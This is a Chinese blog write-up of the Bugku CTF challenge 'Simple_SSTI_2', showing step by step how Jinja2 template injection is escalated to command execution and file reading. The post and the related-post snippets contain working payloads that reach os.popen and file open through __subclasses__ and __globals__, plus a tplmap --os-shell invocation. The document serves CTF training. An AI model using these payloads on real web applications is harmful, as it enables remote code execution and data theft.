WEB Simple_SSTI_2

最新推荐文章于 2023-12-13 16:10:36 发布
最新推荐文章于 2023-12-13 16:10:36 发布
阅读量444 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57954651/article/details/124547801
版权

打开题目 似乎和第一题有相同之处

先来测试一下有没有类似注入的漏洞 

回显正常 说明方向没错 再此构造  ?flag={{''.__class__.__mro__}}(借鉴大佬..)

用mro回显到了两类 str object 我们可利用第二的object来作突破

THEN 利用subclasses这个参数  __subclasses__属性会输出该类下所有的子类

?flag={{''.__class__.__mro__[1].__subclasses__() }}  看到了里面的所有类  像子文件一样

这里我们可用不到那么多   再一次构造  这次我们要用到的参数是 base   init    globals 

?flag={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27catch_warnings%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27].eval("__import__(%27os%27).popen(%27ls%27).read()")%20}}{%%20endif%20%}{%%20endfor%20%}

命令执行中popen(‘ ’)中是我们要具体执行的命令,这里使用popen(‘ls’)列出当前目录,文件读写payload中open(‘ ’)里是我们要填写的文件名

筛选出了存在flag的文件   然后再去打开它  这里我们 改成popen('cat flag')

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('flag', 'r').read() }}{% endif %}{% endfor %}

找到目标flag

 

 

:Carmelo Anthony
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 609
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
Simple_SSTI_1与Simple_SSTI_2
heyingcheng的博客
10-17 3024
#__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。flask是一个使用Python编写的轻量级Web应用框架(一种开发框架,用来支持动态网站,网络应用程序及网络服务的开发。3,SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥。于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
ctf之WEB练习三
渗透测试研究中心
12-15 3052
题目名称:Simple_SSTI_2题目wirteup:启动题目场景,获得靶场网站,访问网站,页面显示url连接需要连接一个 flag参数http://114.67.246.176:19131/根据题目内容,该题是一个ssti漏洞,这里构造ssti,参数构造flag={{3+2}},报错,且是flaskhttp://114.67.246.176:19131/?flag={{3+2}}又尝试构造f...
BugKu-Web-Simple_SSTI_1&Simple_SSTI_2(浅析SSTI模板注入!)
m0_73734159的博客
12-13 1125
服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题。{{}}是模板变量的用法。在模板中,想要展示视图向模板渲染的变量,需要使用{{变量}}进行接收。这些文件包含了程序运行所需的设置和参数,使得程序可以根据配置文件的内容进行适应性调整。唉,我不免耸了耸肩,有些无奈,并未发现什么有用的。对于这段命令,在第一题,我也是有所提及,相差不大。
Bugku:Simple_SSTI_2
weixin_52599204的博客
08-05 399
然后发现里面直接显示了 那么接下来就是找系统命令执行语句的语法。由于题目提示是模板注入,于是直接上payload。说实话原来也没怎么了解过这个框架 于是找了找命令。首先打开环境 提示需要传一个flag参数。这里引用大佬的博客 感兴趣的可以去看看。找到圈起来这条 把里面的。...
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1538
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web...
fenjing工具,ssti
最新发布
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5418
bugku-ctf
Simple web-server目录遍历漏洞
weixin_33795093的博客
06-11 218
漏洞描述: Simple web-server是一款WEB服务程序。 Simple web-server不正确处理目录遍历字符序列,远程***者可以利用漏洞以WEB权限查看系统文件内容。 ------------------------------------------------------------------------ Software..............
bugku web Simple_SSTI_1 Simple_SSTI_2
weixin_45225566的博客
10-19 289
一、知识点 flask模板注入 {{config}} 可以获取当前设置 __class__ 用来查看变量所属的类,根据前面的变量形式可以得到其所属的类 __init__ 初始化类,返回的类型是function __globals__[] 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量 read() 获取返回内容 二、Simple_SSTI_1 http://114.67.246.176:14745/?fla
新BugKu-web篇-Simple_SSTI_2
jiuyongpinyin的博客
05-28 873
新BugKu-web篇-Simple_SSTI_2 这道题就比上一道题相对简单了,因为可以直接使用工具tplmap 下载链接: https://github.com/aStrowxyu/ssti-tools 不过需要Python2的环境 使用工具获得shell python2 tplmap.py -u "http://114.67.246.176:12782?flag=1" --os-shell flag就在目录下 ...
攻防世界-web simple_js
m0_48108919的博客
02-09 699
题目描述:小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 随便输入一个密码,提示人造密码 再查看一下题目叫简单的js,尝试禁用网站的js无果 分析js代码 <script type="text/javascript"> function dechiffre(pass_enc){ var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 3288
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
十九、bugku Simple_SSTI_2
山兔的博客
09-06 437
/?flag={{ config.__class__.__init__.__globals__['os'] .popen('ls ../').read() }} ?flag={{ config.__class__.__init__.__globals__['os'] .popen('cat ../app/flag').read() }} __class__:返回对象所属类 __init__:类的初始方法,用以初始化实例.实际上魔术方法 __new__与__init__共同作为"构造函数",__new_
攻防世界 web simple_js
CN天狼
12-01 1859
打开之后弹了个窗 既然考js f12 调试器里有两个文件 看index <html> <head> <title>JS</title> <script type="text/javascript"> function dechiffre(pass_enc){ var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65...
ssti
2h4ox1n9
05-23 613
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
模板注入(SSTI)攻击(jinja2)
热门推荐
钞sir的博客
10-04 2万+
和常见Web注入(SQL注入等)的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。(web安全中的真理:永远不要相信用户的输入) 以一道CTF为例,简单演示一下注入的流程及一些被过滤了的命令的构造方法; 首先打...
简单搭建simplewebrtc环境
csj6346的专栏
08-06 6174
简要介绍 simplewebrtc是一种简单的开源网页音视频聊天解决方案,由三部分组成: NAT穿透服务器,负责内网穿透,音视频转发 信令服务器,负责信令控制,建立点对点通道 web客户端,负责用户交互和展示 总体参考https://www.cnblogs.com/yubaolee/p/webrtc.html 谢谢yubaolee大神 搭建过程中遇到一些问题,记录一下 准备工作 服...
bugkuctfweb题解simple_ssti_2
03-16
simple_ssti_2 是一道 Bugku CTF 网络安全比赛中的 Web 题目,它是一个简单的 SSTI(Server-Side Template Injection)漏洞题目。在这个题目中,我们需要通过注入一些恶意代码来获取 flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值